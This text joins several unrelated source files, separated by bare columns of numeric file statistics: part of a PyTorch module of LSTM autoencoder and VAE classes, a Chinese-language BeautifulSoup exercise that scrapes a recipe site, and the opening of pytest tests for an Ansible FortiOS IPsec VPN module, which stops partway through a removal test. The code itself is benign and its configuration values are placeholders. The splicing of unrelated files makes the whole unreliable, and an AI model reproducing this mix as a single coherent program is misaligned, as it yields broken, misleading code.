out = self.activation(self.linear1(x))
out = self.linear2(out)
return out
class Discriminator_seq(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0):
super(Discriminator_seq, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.norm = nn.LayerNorm([self.input_len, self.dim])
self.linear = nn.Linear(
in_features=self.dim,
out_features=self.dim_z
)
self.rnn = nn.LSTM(
input_size=self.dim_z,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=True
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z
)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=1
)
self.activation = nn.ReLU()
def forward(self, x, x_lengths):
x = self.norm(x)
x = self.activation(self.linear(x))
x = torch.nn.utils.rnn.pack_padded_sequence(x, x_lengths, batch_first=True, enforce_sorted=False)
out, (_, _) = self.rnn(x)
out, out_lengths = torch.nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
        # index of each sequence's last valid timestep
        last_seq_idxs = out_lengths - 1
        # concatenate the backward direction's output at t=0 with the forward
        # direction's output at the last valid step (the original inline
        # comments had the two directions swapped)
        out = torch.cat([out[:, 0, self.dim_z * 2:],
                         out[range(out.shape[0]), last_seq_idxs, :self.dim_z * 2]],
                        dim=1)
# out = torch.sum(out, dim=1) / out_lengths[:, None].type(torch.FloatTensor).cuda()
out = self.activation(self.linear1(out))
out = self.linear2(out)
return out
class Estimator_length(nn.Module):
def __init__(self, dim_z):
super(Estimator_length, self).__init__()
self.dim_z = dim_z
self.linear1 = nn.Linear(
in_features=self.dim_z,
out_features=int(self.dim_z / 4),
)
self.linear2 = nn.Linear(
in_features=int(self.dim_z / 4),
out_features=1
)
self.activation = nn.ReLU()
def forward(self, x):
x = self.activation(self.linear1(x))
return self.linear2(x)
class lstmAE_wo_Norm(nn.Module):
def __init__(self, input_len, dim, dim_z):
super(lstmAE_wo_Norm, self).__init__()
self.encoder = lstmEncoder_wo_Norm(input_len, dim, dim_z)
self.decoder = lstmDecoder(input_len, dim, dim_z)
def forward(self, x, x_lengths):
z = self.encoder(x, x_lengths)
return [x, self.decoder(z), x_lengths]
class lstmAE(nn.Module):
def __init__(self, input_len, dim, dim_z):
super(lstmAE, self).__init__()
self.encoder = lstmEncoder(input_len, dim, dim_z)
self.decoder = lstmDecoder(input_len, dim, dim_z)
def forward(self, x, x_lengths):
z = self.encoder(x, x_lengths)
return [x, self.decoder(z), x_lengths]
class lstmAE_feedback(nn.Module):
def __init__(self, input_len, dim, dim_z, residual=False):
super(lstmAE_feedback, self).__init__()
self.encoder = lstmEncoder(input_len, dim, dim_z)
self.decoder = lstmDecoder_feedback(input_len, dim, dim_z, residual=residual)
def forward(self, x, x_lengths):
z = self.encoder(x, x_lengths)
return [x, self.decoder(z), x_lengths]
class lstmVAE(nn.Module):
def __init__(self, input_len, dim, dim_z):
super(lstmVAE, self).__init__()
self.encoder = lstmEncoder_vae(input_len, dim, dim_z)
self.decoder = lstmDecoder(input_len, dim, dim_z)
self.estimator_length = Estimator_length(dim_z)
def forward(self, x, x_lengths):
mu, log_var = self.encoder(x, x_lengths)
z = reparametrize(mu, log_var)
return [x, self.decoder(z), x_lengths, mu, log_var, z, self.estimator_length(z)]
class lstmCVAE(nn.Module):
def __init__(self, input_len, dim, dim_z, class_num):
super(lstmCVAE, self).__init__()
self.encoder = lstmEncoder_cvae(input_len, dim, dim_z, class_num)
self.decoder = lstmDecoder_c(input_len, dim, dim_z, class_num)
def forward(self, x, x_lengths, class_vector):
mu, log_var = self.encoder(x, x_lengths, class_vector)
z = reparametrize(mu, log_var)
return [x, self.decoder(z, class_vector), x_lengths, mu, log_var, z]
class lstmCVAE2(nn.Module):
def __init__(self, input_len, dim, dim_z, class_num):
super(lstmCVAE2, self).__init__()
self.encoder = lstmEncoder_cvae(input_len, dim, dim_z, class_num)
self.encoder_class = Encoder_c(dim_z, class_num)
self.decoder = lstmDecoder_c(input_len, dim, dim_z, class_num)
def forward(self, x, x_lengths, class_vector):
mu, log_var = self.encoder(x, x_lengths, class_vector)
mu_c, log_var_c = self.encoder_class(class_vector)
z = reparametrize(mu, log_var)
return [x, self.decoder(z, class_vector), x_lengths, mu, log_var, z, mu_c, log_var_c]
class lstmVAE_feedback(nn.Module):
def __init__(self, input_len, dim, dim_z, residual=False):
super(lstmVAE_feedback, self).__init__()
self.encoder = lstmEncoder_vae(input_len, dim, dim_z)
self.decoder = lstmDecoder_feedback(input_len, dim, dim_z, residual=residual)
def forward(self, x, x_lengths):
mu, log_var = self.encoder(x, x_lengths)
z = reparametrize(mu, log_var)
return [x, self.decoder(z), x_lengths, mu, log_var, z]
class lstmVAE_initfeed(nn.Module):
def __init__(self, input_len, dim, dim_z, residual=False):
super(lstmVAE_initfeed, self).__init__()
self.encoder = lstmEncoder_vae(input_len, dim, dim_z)
self.decoder = lstmDecoder_initfeed(input_len, dim, dim_z, residual=residual)
self.estimator_length = Estimator_length(dim_z)
def forward(self, x, x_lengths):
mu, log_var = self.encoder(x, x_lengths)
z = reparametrize(mu, log_var)
pose = x[:, 0, :] # batch, time, pose
return [x, self.decoder(z, pose), x_lengths, mu, log_var, z, self.estimator_length(z)]
def reparametrize(mu, log_var):
std = torch.exp(0.5 * log_var)
eps = torch.randn_like(mu)
return eps * std + mu
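# A quick sanity check of the reparameterization trick (a sketch, not part of
# the original file; it reuses the file's existing torch import): with mu = 0
# and log_var = 0, z = eps * std + mu should be approximately standard normal.
if __name__ == '__main__':
    mu = torch.zeros(10000, 8)
    log_var = torch.zeros(10000, 8)
    z = reparametrize(mu, log_var)
    print(z.mean().item(), z.std().item())  # expect roughly 0 and 1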
| 30.730878
| 105
| 0.547198
| 2,752
| 21,696
| 4.03561
| 0.042151
| 0.053665
| 0.072033
| 0.084999
| 0.928777
| 0.915181
| 0.899604
| 0.867819
| 0.865208
| 0.860886
| 0
| 0.012239
| 0.344718
| 21,696
| 705
| 106
| 30.774468
| 0.768939
| 0.010647
| 0
| 0.746562
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08055
| false
| 0
| 0.003929
| 0
| 0.165029
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9b9d49a10df03c67b767356dd971e1272708fc6
| 689
|
py
|
Python
|
code2/day03/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | 1
|
2019-12-31T16:44:06.000Z
|
2019-12-31T16:44:06.000Z
|
code2/day03/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | null | null | null |
code2/day03/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | 1
|
2022-01-13T10:32:22.000Z
|
2022-01-13T10:32:22.000Z
|
"""
课堂练习
续写下方代码,使用find_all()语法查找最小父级标签,并把查找的结果打印出来。
不懂做?点击下面的“需要帮助”。
"""
# 引用requests库
import requests
# 引用BeautifulSoup库
from bs4 import BeautifulSoup
# 获取数据
res_foods = requests.get('http://www.xiachufang.com/explore/')
# 解析数据
bs_foods = BeautifulSoup(res_foods.text, 'html.parser')
info = bs_foods.find_all("div", class_="info pure-u")
print(info)
"""
这个,是我提供的参考答案:
"""
# 引用requests库
import requests
# 引用BeautifulSoup库
from bs4 import BeautifulSoup
# 获取数据
res_foods = requests.get('http://www.xiachufang.com/explore/')
# 解析数据
bs_foods = BeautifulSoup(res_foods.text, 'html.parser')
# 查找最小父级标签
list_foods = bs_foods.find_all('div', class_='info pure-u')
# 打印最小父级标签
print(list_foods)
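# A possible next step (a sketch only; the markup inside the 'info pure-u'
# divs is an assumption, not something the exercise specifies): pull the
# first link's text out of each parent tag.
for food in list_foods:
    link = food.find('a')
    if link is not None:
        print(link.text.strip())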
| 19.685714
| 62
| 0.751814
| 93
| 689
| 5.408602
| 0.451613
| 0.063618
| 0.099404
| 0.163022
| 0.771372
| 0.771372
| 0.771372
| 0.771372
| 0.771372
| 0.648111
| 0
| 0.003231
| 0.101597
| 689
| 34
| 63
| 20.264706
| 0.80937
| 0.235123
| 0
| 0.666667
| 0
| 0
| 0.241309
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6a422b834c2af6209f507d521976c17d66cffe6d
| 57,781
|
py
|
Python
|
v6.0.5/vpn_ipsec/test_fortios_vpn_ipsec_phase1_interface.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 14
|
2018-09-25T20:35:25.000Z
|
2021-07-14T04:30:54.000Z
|
v6.0.5/vpn_ipsec/test_fortios_vpn_ipsec_phase1_interface.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 32
|
2018-10-09T04:13:42.000Z
|
2020-05-11T07:20:28.000Z
|
v6.0.5/vpn_ipsec/test_fortios_vpn_ipsec_phase1_interface.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 11
|
2018-10-09T00:14:53.000Z
|
2021-11-03T10:54:09.000Z
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_vpn_ipsec_phase1_interface
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_vpn_ipsec_phase1_interface.Connection')
return connection_class_mock
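# Note: FortiOSHandler is constructed with the fixture *function* itself
# rather than a mock instance; the tests below patch FortiOSHandler.set and
# FortiOSHandler.delete, so the underlying connection is never exercised.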
fos_instance = FortiOSHandler(connection_mock)
def test_vpn_ipsec_phase1_interface_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1_interface': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-discovery-forwarder': 'enable',
'auto-discovery-psk': 'enable',
'auto-discovery-receiver': 'enable',
'auto-discovery-sender': 'enable',
'auto-negotiate': 'enable',
'banner': 'test_value_18',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_23',
'default-gw': 'test_value_24',
'default-gw-priority': '25',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '28',
'dns-mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd-retrycount': '32',
'dpd-retryinterval': 'test_value_33',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'encap-local-gw4': 'test_value_36',
'encap-local-gw6': 'test_value_37',
'encap-remote-gw4': 'test_value_38',
'encap-remote-gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation-address': 'ike',
'enforce-unique-id': 'disable',
'exchange-interface-ip': 'enable',
'exchange-ip-addr4': 'test_value_44',
'exchange-ip-addr6': 'test_value_45',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '48',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_50',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '53',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_56',
'ip-version': '4',
'ipv4-dns-server1': 'test_value_58',
'ipv4-dns-server2': 'test_value_59',
'ipv4-dns-server3': 'test_value_60',
'ipv4-end-ip': 'test_value_61',
'ipv4-name': 'test_value_62',
'ipv4-netmask': 'test_value_63',
'ipv4-split-exclude': 'test_value_64',
'ipv4-split-include': 'test_value_65',
'ipv4-start-ip': 'test_value_66',
'ipv4-wins-server1': 'test_value_67',
'ipv4-wins-server2': 'test_value_68',
'ipv6-dns-server1': 'test_value_69',
'ipv6-dns-server2': 'test_value_70',
'ipv6-dns-server3': 'test_value_71',
'ipv6-end-ip': 'test_value_72',
'ipv6-name': 'test_value_73',
'ipv6-prefix': '74',
'ipv6-split-exclude': 'test_value_75',
'ipv6-split-include': 'test_value_76',
'ipv6-start-ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local-gw': 'test_value_80',
'local-gw6': 'test_value_81',
'localid': 'test_value_82',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'monitor': 'test_value_87',
'monitor-hold-down-delay': '88',
'monitor-hold-down-time': 'test_value_89',
'monitor-hold-down-type': 'immediate',
'monitor-hold-down-weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate-timeout': '94',
'net-device': 'enable',
'passive-mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_102',
'ppk-secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret-remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_110',
'remote-gw6': 'test_value_111',
'remotegw-ddns': 'test_value_112',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_117',
'suite-b': 'disable',
'tunnel-search': 'selectors',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
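# (Every test in this module follows the same pattern: the module receives
# Ansible-style underscore keys, e.g. 'add_gw_route', and expected_data checks
# that it emits the FortiOS API's hyphenated equivalents, e.g. 'add-gw-route'.)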
def test_vpn_ipsec_phase1_interface_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1_interface': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-discovery-forwarder': 'enable',
'auto-discovery-psk': 'enable',
'auto-discovery-receiver': 'enable',
'auto-discovery-sender': 'enable',
'auto-negotiate': 'enable',
'banner': 'test_value_18',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_23',
'default-gw': 'test_value_24',
'default-gw-priority': '25',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '28',
'dns-mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd-retrycount': '32',
'dpd-retryinterval': 'test_value_33',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'encap-local-gw4': 'test_value_36',
'encap-local-gw6': 'test_value_37',
'encap-remote-gw4': 'test_value_38',
'encap-remote-gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation-address': 'ike',
'enforce-unique-id': 'disable',
'exchange-interface-ip': 'enable',
'exchange-ip-addr4': 'test_value_44',
'exchange-ip-addr6': 'test_value_45',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '48',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_50',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '53',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_56',
'ip-version': '4',
'ipv4-dns-server1': 'test_value_58',
'ipv4-dns-server2': 'test_value_59',
'ipv4-dns-server3': 'test_value_60',
'ipv4-end-ip': 'test_value_61',
'ipv4-name': 'test_value_62',
'ipv4-netmask': 'test_value_63',
'ipv4-split-exclude': 'test_value_64',
'ipv4-split-include': 'test_value_65',
'ipv4-start-ip': 'test_value_66',
'ipv4-wins-server1': 'test_value_67',
'ipv4-wins-server2': 'test_value_68',
'ipv6-dns-server1': 'test_value_69',
'ipv6-dns-server2': 'test_value_70',
'ipv6-dns-server3': 'test_value_71',
'ipv6-end-ip': 'test_value_72',
'ipv6-name': 'test_value_73',
'ipv6-prefix': '74',
'ipv6-split-exclude': 'test_value_75',
'ipv6-split-include': 'test_value_76',
'ipv6-start-ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local-gw': 'test_value_80',
'local-gw6': 'test_value_81',
'localid': 'test_value_82',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'monitor': 'test_value_87',
'monitor-hold-down-delay': '88',
'monitor-hold-down-time': 'test_value_89',
'monitor-hold-down-type': 'immediate',
'monitor-hold-down-weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate-timeout': '94',
'net-device': 'enable',
'passive-mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_102',
'ppk-secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret-remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_110',
'remote-gw6': 'test_value_111',
'remotegw-ddns': 'test_value_112',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_117',
'suite-b': 'disable',
'tunnel-search': 'selectors',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_vpn_ipsec_phase1_interface_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'vpn_ipsec_phase1_interface': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
